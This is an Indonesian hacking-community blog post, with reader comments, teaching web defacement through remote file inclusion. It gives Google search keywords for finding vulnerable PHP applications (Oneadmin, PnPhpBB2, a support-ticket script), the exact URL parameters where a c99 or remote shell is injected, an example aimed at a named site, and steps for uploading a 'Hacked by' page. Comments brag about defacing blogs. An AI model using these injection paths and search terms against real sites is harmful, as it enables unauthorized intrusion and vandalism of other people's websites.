Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Cara Mudah Deface Web Via RFI

15 September 2008
Penulis:   · Kategori Artikel: Hacking, Vuln

BINUS HACKER Binus Hacker Is Not Criminal Banner

BINUS HACKER

BINUS HACKER


Cara Mudah Deface Remote File Include

Sebelum kita mulai lebih baik juga kita mengetahwi berbagai macam Command command yang bermanfaat bagi kita..

cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
find = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url

[EvilShellInject] = inject rshell / c99 kamu

Baiklah kita mulai dengan PHP karena PHP banyak sekali BUG nya..di antaranya :

Googling ajah, sebelumnya cari dulu RFI di http://www.milw0rm.com

– Site Oneadmin RFI

Kamu Search di Google masukkan Kata Kunci oneadmin site:.com / oneadmin site:com
nah sekarang saya kasi contoh pathnya … http://target.com/oneadmin/config.php?path[docroot]=

Contoh :
http://target.com/oneadmin/config.php?path[docroot]=[EvilShellInject]

– PnPhpBB2

Kamu Search di Google masukkan Kata Kunci modules.php powered by pnphpbb2 site:.com / modules.php powered by pnphpbb2 site:.net atau apa saja yang kalian suka atau kehendaki…

nah sekarang saya kasi contoh pathnya … http://target.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

Contoh :
http://www.sikhe.com/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=[EvilShellInject]

– Support Ticket

Kamu Search di Google masukkan Kata Kunci include/main.php site:.com / include/main.php site:.net atau apa saja yang kalian suka atau kehendaki…
nah sekarang saya kasi contoh pathnya … http://target.com/include/main.php?config[search_disp]=true&include_dir=

Contoh : … http://target.com/include/main.php?config[search_disp]=true&include_dir=[EvilShellInject]

Hehehe Lumayan banyak kan ? Nah selamat mencobanya..
Neh aku kasi beberapa web yang telah berhasil saya Deface..

Nah setelah itu buadlah sebuad file: index.html

Isi dengan:
<html>
Hacked by Nama Kamu
</html>

Kemudian upload deh file ke directorynya

kemudian buka website yang telah di deface:
http://target.com/lokasipathnya/index.html

Enjoy

BINUS HACKER Binus Hacker Chat and Forum

Komentar

55 Komentar Untuk “Cara Mudah Deface Web Via RFI
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. F4RhaN pada 14 December 2012 8:03 pm

    bang izin copas

  2. depok cyber pada 14 January 2013 3:16 am

    .jare sopo blogspot nda bisa dideface?? jajalke iki sek cah
    http://malang-cyber.blogspot.com/

  3. akhyar pada 15 January 2013 8:26 am

    aku juga iso deface blogspot

    ini buktinya
    http://xp1nank.blogspot.com

  4. Deka pada 4 February 2013 10:49 pm

    Gue Juga bIsa Ni buktinya Blog Mantan saya ,

    http://buatyangulangtahun.blogspot.com/

  5. ssjero30 pada 8 February 2013 4:26 pm

    @akhyar
    @Deka=====>>>>> coba kalo bisa… paling-paling itu blog buatan sendiri… di desain kya gitu…bilangnya deface…. 😛

Silahkan Berikan Tanggapan Anda...